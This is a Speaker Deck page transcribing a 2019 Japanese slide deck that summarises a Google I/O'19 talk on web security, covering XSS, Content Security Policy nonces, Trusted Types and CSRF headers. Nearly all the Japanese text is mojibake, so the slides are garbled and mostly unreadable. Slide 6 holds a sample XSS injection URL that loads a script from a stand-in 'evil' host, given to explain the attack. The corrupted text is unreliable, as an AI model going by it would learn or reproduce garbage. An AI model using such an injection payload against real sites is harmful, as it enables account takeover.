Upgrade to Pro — share decks privately, control downloads, hide ads and more …

'Securing Web Apps with Modern Platform Features' を意訳してみる / Translate Securing Web Apps with Modern Platform Features

'Securing Web Apps with Modern Platform Features' を意訳してみる / Translate Securing Web Apps with Modern Platform Features

0631f2e33b42847ae5dedbdd53e1c1a4?s=128

sunecosuri

June 19, 2019
Tweet

Transcript

  1. Securing Web Apps with Modern Platform Features Securing Web Apps

    with Modern Platform Features @sunecosuri Date: 2019-06-19
 Google I/O’19 ͷWebΛ·ͱΊΔձ Λ·ͱΊͯΈΔ
  2. Securing Web Apps with Modern Platform Features ஫ҙ ·ͱΊͯΈΔɺͱॻ͍ͨ΋ͷͷ
 Ұ෦Λ୺ં͍ͬͯΔՕॴ͕͋ΔͨΊશͯ·ͱΊΒΕ͍ͯ·ͤΜ


    ৄࡉ͸ݩͷಈըʹͳΔηογϣϯΛ͝ཡ͍ͩ͘͞
 
 https://www.youtube.com/watch?v=DDtM9caQ97I
  3. GMOϖύϘ ΤϯδχΞ ϗεςΟϯάࣄۀ෦ϗεςΟϯάάϧʔϓ
 ໐ւ ߂ً / @sunecosuri ϚωʔδυΫϥ΢υνʔϜ

  4. Overview Overview XSS΍CSRFͳͲͷ͋Γ͕ͪͳ੬ऑੑ͸௕͖ʹ౉ͬͯWebΛ೰·ͤɺ·ͨGoogleͷ Vulnerability Reward ProgramͰ΋සൟʹใࠂ͞Ε͍ͯ·͢ɻ࠷৽ͷWebϓϥοτϑΥʔϜʹ ͓͚ΔηΩϡϦςΟͷ࢓૊ΈΛֶΜͰɺ͋ͳͨͷαʔϏεΛΠϯδΣΫγϣϯ͔Β๷͍Ͱةݥͳ αΠτ͔Βִ཭͠·͠ΐ͏ɻ
 ·ͨɺWebͰ΋ͬͱ΋ηϯγςΟϒͳΞϓϦΛक͍ͬͯΔGoogleͷηΩϡϦςΟνʔϜͷܦݧ ʹΑͬͯಘΒΕͨϒϥ΢βͷ৽ػೳʹΑͬͯɺ͋ͳͨͷΞϓϦέʔγϣϯΛकΔͨΊͷνΣοΫ

    ϦετΛ஌Γ·͠ΐ͏ɻ ͜ ͷ η ο γ ϣ ϯ ʹ ͭ ͍ ͯ
  5. όάใࠂใ঑੍ۚ౓ͷڈ೥ͷׂ߹

  6. Cross-site scripting Cross-site scripting (XSS) I n j e c

    t i o n s 1. ϩάΠϯϢʔβʔ͕߈ܸऀͷϖʔδΛ๚໰ 2. ߈ܸऀ͕ϢʔβʔΛ੬ऑͳURLʹ༠ಋ͢Δ
 https://test.example/?query=<script src=“//evil/” > 3. εΫϦϓτ͕࣮ߦ͞Εɺ߈ܸऀ͕ϢʔβʔͷઃఆʹΞΫηε͢Δ
  7. XSS is turai ͜ΕΒͷΠϯδΣΫγϣϯ߈ܸ
 ʹରͯ͠XSS͸ۀքશମͰେ͖ ͳ໰୊ͱͳ͍ͬͯΔ

  8. Let’s start CSP ·ͣɺίϯςϯπηΩϡϦςΟ ϙϦγʔ͔Β࢝Ί·͠ΐ͏

  9. Content Security Policy Content Security Policy Level3 Ϧ ι ʔε

    ୯ Ґ Ͱ s c r i p t ͷ ࣮ ߦ Λ ੍ ޚ Ͱ ͖ Δ ػ ߏ ΞϓϦέʔγϣϯͷεΫϦϓτ࣮ߦʹؔ͢Δ͖Ίࡉ͔͘ ੍ޚ͢Δ࢓૊ΈΛಋೖͯ͠XSS͔Β๷ޚ͢Δ
 scriptͷ࣮ߦ΍ϓϥάΠϯͷಡΈࠐΈΛίϯτϩʔϧ͢Δ ͜ͱ͕Ͱ͖Δ CSP͸ɺద੾ͳΤεέʔϓ·ͨ͸XSSΛڐ༰͢ΔόάΛमਖ਼͢Δ΋ͷͰ͸͋Γ·ͤΜ
  10. How to implement Ͳ͏΍࣮ͬͯ૷͢Δͷ͔

  11. Content Security Policy CSP͸HTTP Response Header Chrome dev tools ͷNetworkλϒ͔ΒͷΩϟϓνϟ

    ࢦఆͨ͠Ϩεϙϯεʹؔ͢ΔϙϦγʔΛɺϒϥ΢βଆͰ औಘ͠ɺࢦఆͨ͠ϙϦγʔΛಡΜͰ࣮ߦՄ൱Λ੍ޚ͢Δ
  12. support for reports CSP͸Ϩϙʔτઐ༻Ϟʔυ΋α ϙʔτ͍ͯ͠·͢

  13. support for reports

  14. Content Security Policy Nonce-Based CSP ͷߟ͑ํ ͜ͷΑ͏ʹCSPΛઃఆ͢Δͱ nonce ͳ͠ͷscript͸ϒϥ΢βʹΑͬͯϒϩοΫ ༗ޮͳnonceΛ࣋ͭεΫϦϓτλάͰ͋Ε͹࣮ߦ

    ্هͷΑ͏ͳnonceΛϦΫΤετ͝ͱʹมߋ͢Ε͹߈ܸऀ͸༧ଌͰ͖ͳ͍
  15. CDNͱ͔ͷଞͷ৔ॴͰ
 ϗετ͞Ε͍ͯΔJavaScript͸࣮ߦ
 ͞Εͳ͘ͳͬͯ͠·͏ͷͰ͸…ʁ

  16. Content Security Policy ͦͷͨΊͷ ‘strict-dynamic’ strict-dynamic Λ࢖༻͢Δͱɺ͢Ͱʹ৴པ͞Ε͍ͯΔεΫϦϓτΛڐՄ͢Δ͜ͱͰɺ
 nonceͷ͍ͭͨεΫϦϓτ͔Βੜ੒͞ΕͨεΫϦϓτ͸࣮ߦՄೳʹͳΔ ࣮ߦ͞ΕΔ

  17. Content Security Policy ͲͷΑ͏ʹಋೖ͢Δ͔ 1. onclick΍hrefͰࢦఆ͞ΕΔΠϯϥΠϯΠϕϯτϋϯυϥʔΛͳ͘͢ 2.αʔόʔαΠυςϯϓϨʔτʹͯnonceΛࢦఆ͢Δ 3.ϨεϙϯεϔομʔͰCSPΛࢦఆ͢Δ

  18. Trusted Types Trusted-types D o m ͷ ߋ ৽ ʹ

    ੍ ໿ Λ ઃ ͚ Δ ͜ ͱ ͕ Ͱ ͖ Δ ػ ߏ 1. ݸผʹఆٛͨ͠Trusted Type Policies͔Βੜ੒͞ΕΔ
 Trusted TypesΦϒδΣΫτͰͷΈɺDOMΛߋ৽Ͱ͖Δ 2.αχλΠζͷॲཧΛϙϦγʔΦϒδΣΫτʹू໿Ͱ͖Δ https://github.com/WICG/trusted-types ʹͯɺ 
 શͯͷϒϥ΢βͰػೳ͢Δ Polyfill ΋༻ҙ͞Ε͓ͯΓࢼͤΔΑ͏ʹͳ͍ͬͯΔ
  19. 1. validation ruleΛఆٛͨ͠ϙϦγʔΛ࡞੒͢Δ
 
 
 
 2. ϙϦγʔΛ࢖༻ͯ͠৴པͰ͖ΔܕͷΦϒδΣΫτΛ࡞੒͢Δ
 
 ͋

    3. ࡞੒ͨ͠ ”samplePolicy” Λ CSPheader ʹ௥Ճ͢Δ͜ͱͰར༻Ͱ͖Δ
 
 Trusted Types Trusted-types D o m ͷ ߋ ৽ ʹ ੍ ໿ Λ ઃ ͚ Δ ͜ ͱ ͕ Ͱ ͖ Δ ػ ߏ
  20. Trusted Types Default Policy͸ String ͕ೖͬͨ࣌ͷ fallbackͱͯ͠ػೳ͢Δ 1. validation ruleΛఆٛͨ͠ϙϦγʔΛ࡞੒͢Δ

    2. CSP headerʹ௥Ճ͢Δ
  21. Trusted
 Types 1. ݸผʹఆٛͨ͠Trusted Type Policies͔Βੜ੒͞ΕΔTrusted TypesΦϒδΣΫτͰͷΈɺ DOMΛߋ৽Ͱ͖Δ 2. αχλΠζͷॲཧΛϙϦγʔΦϒδΣΫτʹू໿Ͱ͖Δ

    ৄ͘͠͸ https://github.com/WICG/trusted-types ͳʹ͕خ͍͠ͷ͔ T r u s t e d T y p e s ͷ
  22. cross-site request forgeries CSRFରࡦͷ࿩

  23. cross-site request forgeries • same-origin: ಉ͡εΩʔϚɺϗετɺϙʔτΛ࣋ͬͨαΠτಉ࢜ͷ͜ͱ 
 - https://www.google.com/foo
 -

    https://www.google.com/bar • same-site: ಉ͡εΩʔϚͱυϝΠϯΛ࣋ͬͨαΠτಉ࢜ͷ͜ͱ 
 - https://mail.google.com
 - https://photos.google.com • cross-site: ͦͷଞ (https://www.youtube.com/, https://www.google.com/) Origin ͱ Site ͷҧ͍ʹ͍ͭͯ
  24. Sec-Fetch-Site
 Sec-Fetch-Modeʹ͍ͭͯ কདྷతʹheaderͰಉҰorigin͔corsͳͲ൑ผͰ͖Δ

  25. ͓͠·͍